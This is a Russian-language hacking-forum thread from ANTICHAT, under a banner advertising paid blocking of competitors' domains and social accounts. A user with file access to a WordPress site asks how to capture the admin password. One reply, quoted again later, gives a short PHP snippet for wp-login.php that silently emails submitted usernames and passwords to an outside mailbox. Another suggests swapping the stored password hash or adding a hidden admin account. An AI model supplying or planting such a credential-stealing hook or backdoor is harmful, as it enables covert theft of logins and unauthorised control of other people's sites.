УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Вопрос о wordpress

Опции темы

Поиск в этой теме

Опции просмотра

20.08.2016, 19:31

Alaich

Guest

Сообщений: n/a

Провел на форуме:
4566

Репутация: 7

Есть доступ к файлам сайта на wp , права все есть .Вопрос, как можно перехватить пароль в админку ?

21.08.2016, 09:32

pas9x

Guest

Сообщений: n/a

Провел на форуме:
97867

Репутация: 52

В начало файла wp-login.php добавить:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (!empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'log'[/COLOR][COLOR="#007700"]]) && !empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pwd'[/COLOR][COLOR="#007700"]])) {
[/COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Login: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'log'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Pass: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pwd'[/COLOR][COLOR="#007700"]];
@[/COLOR][COLOR="#0000BB"]mail[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'you@mail.ru'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'What you need'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#007700"]);
}[/COLOR][/COLOR]

21.08.2016, 14:51

Absurd

Guest

Сообщений: n/a

Провел на форуме:
3734

Репутация: 0

Цитата:

Сообщение от Alaich

Alaich said:
↑
Есть доступ к файлам сайта на wp , права все есть .Вопрос, как можно перехватить пароль в админку ?

Пароль в открытой форме в вп нигде не фигурирует, только md5.

Так что как вариант либо скопировать из базы старый пароль, затем установить свой, войти в админку, сделать что надо и затем вернуть старый пароль.

Либо добавить базу нового админа и под ним заходить.

22.08.2016, 21:35

Alaich

Guest

Сообщений: n/a

Провел на форуме:
4566

Репутация: 7

Цитата:

Сообщение от pas9x

pas9x said:
↑
В начало файла wp-login.php добавить:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (!empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'log'[/COLOR][COLOR="#007700"]]) && !empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pwd'[/COLOR][COLOR="#007700"]])) {
[/COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Login: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'log'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Pass: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pwd'[/COLOR][COLOR="#007700"]];
@[/COLOR][COLOR="#0000BB"]mail[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'you@mail.ru'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'What you need'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#007700"]);
}[/COLOR][/COLOR]